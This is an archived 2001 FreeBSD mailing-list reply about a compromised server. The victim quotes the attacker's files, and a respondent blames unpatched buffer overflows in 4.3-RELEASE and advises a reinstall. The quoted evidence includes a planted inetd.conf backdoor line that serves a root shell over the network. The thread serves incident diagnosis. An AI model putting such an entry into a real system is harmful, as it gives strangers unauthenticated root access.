From owner-freebsd-questions Thu Oct 18 13:38:37 2001 Delivered-To: freebsd-questions@freebsd.org Received: from rutger.owt.com (rutger.owt.com [204.118.6.16]) by hub.freebsd.org (Postfix) with ESMTP id 590B837B401 for ; Thu, 18 Oct 2001 13:38:27 -0700 (PDT) Received: from oneworld.owt.com (oneworld.owt.com [204.118.6.2]) by rutger.owt.com (8.9.3/8.9.3) with ESMTP id NAA26941; Thu, 18 Oct 2001 13:38:26 -0700 Received: from owt.com (owt-207-41-94-232.owt.com [207.41.94.232]) by oneworld.owt.com (8.11.4/8.11.4) with ESMTP id f9IKcOt08776; Thu, 18 Oct 2001 13:38:25 -0700 Message-ID: <3BCF3DBE.C705892A@owt.com> Date: Thu, 18 Oct 2001 13:38:22 -0700 From: Kent Stewart X-Mailer: Mozilla 4.77 [en] (Windows NT 5.0; U) X-Accept-Language: en,pdf MIME-Version: 1.0 To: Tomek Cc: freebsd-questions@FreeBSD.ORG Subject: Re: I got hacked, I think References: <20011018131823.Y621-100000@jodie.ncptiddische.net> <011e01c157cf$9b401700$f6f073d1@mpionline.com> <20011018165057.V3734@ns2.wananchi.com> <01e701c157e4$f012abc0$f6f073d1@mpionline.com> <20011018180513.C3734@ns2.wananchi.com> <20011018114805.E70327@acadia.ne.mediaone.net> <018801c157ef$37ec0720$f6f073d1@mpionline.com> <03db01c15812$c4575d40$f6f073d1@mpionline.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Tomek wrote: > > I found out more info. > > -rw-r--r-- 1 Broot wheel 54 Sep 26 10:24 /inetd.conf > -rw-r--r-- 1 Broot wheel 85857 Sep 26 21:38 /sudo-1.6.3.7_1.tgz > -rw------- 1 Broot wheel 4869 Sep 26 10:25 /etc/inetd.conf > > Checking the bizarre /inetd.conf is shocking: > eklogin stream tcp nowait root /bin/sh sh -i > > I take it that "sh" would not even request a login or anything if called > directly from inetd.conf, would it? I am sitting here, he is STILL > pinging me and watching the system (even tried to ftp again a few > minutes ago), and for the life of me I can't figure out where it all > began... who did he even login in the first time, maybe it was some > buffer overflow or something.... yuck. It began because you were using 4.3-release and you probably didn't fix the security problems. There were several buffer overflow problems for daemons that have been published for 4.3-r. The only solution in case of a hacked has been to do a wipe and reinstall. Kent > > TY for all your help guys, you are all wonderful! I will leave you in > peace now (I hope). I still dont know about Broot though... > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message -- Kent Stewart Richland, WA http://users.owt.com/kstewart Carl Sagan quote on Seti@home http://setiathome.ssl.berkeley.edu/pale_blue_dot.html To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message